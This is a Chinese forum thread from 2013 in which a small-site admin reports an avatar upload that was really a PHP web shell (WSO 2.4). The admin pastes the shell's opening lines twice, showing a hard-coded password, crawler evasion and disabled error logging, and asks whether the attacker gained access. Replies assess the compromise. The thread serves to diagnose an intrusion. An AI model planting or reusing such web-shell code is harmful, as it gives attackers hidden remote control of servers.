推荐书目
› 高性能网站建设进阶指南
› High Performance Web Sites
› Google Hacks: Tips & Tools for Finding and Using the World's Information
关于 Google SEO 最好的一本书
› High Performance Web Sites
› Google Hacks: Tips & Tools for Finding and Using the World's Information
关于 Google SEO 最好的一本书
这是一个创建于 4691 天前的主题,其中的信息可能已经有所发展或是发生改变。
一个小论坛,用的是thinksaas,对方注册账号,上传头像(伪装木马),直接打头像网址显示部分代码如下:
<?php # Web Shell by oRb
$auth_pass = md5("123456");
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.4');
....................
请问怎样判断对方是否拿到了权限呢?
<?php # Web Shell by oRb
$auth_pass = md5("123456");
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.4');
....................
请问怎样判断对方是否拿到了权限呢?
 |
1
jimmy2010 2013 年 3 月 11 日
这样的木马是不起作用的吧,代码都没运行
|
 |
6
jybox 2013 年 3 月 11 日
这个黑阔很可能已经得手了,现在他可以远程执行命令,至于是root权限还是www-data的权限,要看你的服务器的权限配置.
他很可能在不止一个文件中挂了后门. |
 |
7
GASALA OP |
|
8
jimmy2010 2013 年 3 月 11 日
|
 |
9
1314258 2013 年 3 月 11 日 via iPhone
别以为jpg不会执行。
|
 |
10
notsobad 2013 年 3 月 12 日  1
|
Select Language